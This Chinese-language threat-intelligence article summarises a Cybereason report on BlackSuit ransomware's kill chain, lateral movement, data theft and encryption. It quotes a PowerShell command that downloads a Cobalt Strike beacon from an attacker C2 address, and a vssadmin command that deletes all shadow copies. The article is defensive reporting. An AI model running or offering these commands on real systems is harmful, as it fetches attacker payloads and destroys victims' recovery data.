高度協同的破壞性勒索活動

Cybereason最新調查揭露，BlackSuit勒索軟件組織（臭名昭著的Royal和Conti威脅組織的重組后繼者）正在實施一場高度協同的破壞性勒索活動。該活動融合了隱蔽性、速度和精準打擊能力，堪稱今年最復雜的勒索軟件攻擊之一。

Cybereason在報告中指出："BlackSuit是2023年年中出現的勒索軟件組織，被廣泛認為是Royal勒索團伙的改頭換面或分支。"

三重殺傷鏈攻擊模式

與傳統僅關注加密的勒索攻擊不同，BlackSuit采用三階段殺傷鏈：初始入侵、數據竊取和選擇性加密，并輔以數據刪除手段破壞恢復工作。

攻擊始于部署Cobalt Strike信標實現命令控制(C2)和橫向移動。雖然初始入侵途徑尚不明確，但分析人員注意到早期流量來自未安裝Cybereason傳感器的設備，表明系統早已被攻陷。

研究團隊強調："Cobalt Strike被確認為BlackSuit勒索軟件的主要攻擊工具。"

橫向移動技術組合

BlackSuit采用多種技術實現橫向移動：

• 通過PsExec.exe在C:\Windows\Temp目錄分發執行vm.dll和vm80.dll等載荷
• 創建具有System權限的RPC服務
• 使用Configure-SMRemoting.exe建立遠程桌面連接
• 從網絡共享執行frdke23.exe等可疑二進制文件，通過rundll32.exe將代碼注入wuauclt.exe等合法進程

這些技術使攻擊者能在全網進行廣泛偵察和載荷部署的同時保持隱蔽性。

載荷投遞與執行特征

攻擊者使用如下PowerShell命令下載Cobalt Strike信標：

invoke-webrequest http://184.174.96[.]71:8002/download/file.ext -OutFile c:\programdata\vm.dll

同一C2基礎設施被用于投遞最終載荷——通過重命名為b.exe和vmware.dll等文件部署BlackSuit勒索軟件。一個異常特征是執行時使用了-nomutex標志：

"與典型勒索行為不同...-nomutex標志禁用互斥體創建...允許并發多實例執行——可能是為了實現冗余、加速跨會話加密或規避基于互斥體的檢測。"

雙重勒索與破壞恢復

加密前，攻擊者使用偽裝成vmware.exe的rclone.exe竊取約60GB敏感數據。這反映了雙重勒索策略的流行趨勢——通過預先竊取數據增加贖金壓力。

為破壞系統恢復，攻擊者使用vssadmin.exe刪除卷影副本：

vssadmin delete shadows /all /quiet

隨后立即執行勒索軟件，僅針對特定文件類型加密，同時排除Windows、IPC$和ADMIN$等系統關鍵文件夾以避免業務中斷。

精心設計的加密邏輯

BlackSuit的加密邏輯針對性能和隱蔽性進行了優化，避免加密.exe、.dll和.BlackSuit文件，并投放勒索說明。